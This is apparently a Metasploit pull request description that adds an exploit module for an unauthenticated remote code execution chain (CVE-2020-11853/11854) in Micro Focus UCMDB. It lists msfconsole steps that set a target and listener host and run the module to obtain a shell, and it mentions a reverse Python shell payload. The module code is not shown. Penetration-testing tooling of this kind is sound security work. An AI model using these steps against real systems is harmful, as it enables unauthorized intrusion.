rapid7/metasploit-framework
# Add exploit for Micro Focus UCMDB unauthenticated RCE

This module adds a new exploit for CVE-2020-11853 and 11854. It is an unauthenticated remote code execution chain that affects Micro Focus UCMDB, which is embedded in many Micro Focus products.

It seems MF doesn't offer this version for download any more, so I should send a pcap to you?

## Verification

1. Install the application
2. Start msfconsole
3. `use exploit/multi/http/microfocus_ucmdb_unauth_deser`
4. `set rhost TARGET'
5. `set lhost YOUR_IP`
6. `set target 0|1`
7. `run`
8. You should get a shell.

**NOTE: as I have said before [in my previous PR](https://github.com/rapid7/metasploit-framework/pull/13604), Metasploit ysoserial Linux payloads are currently BROKEN! Only cmd/unix/generic works, none of the others work. This module ideally should run with cmd/unix/reverse_python. See bug #13753 for details.**
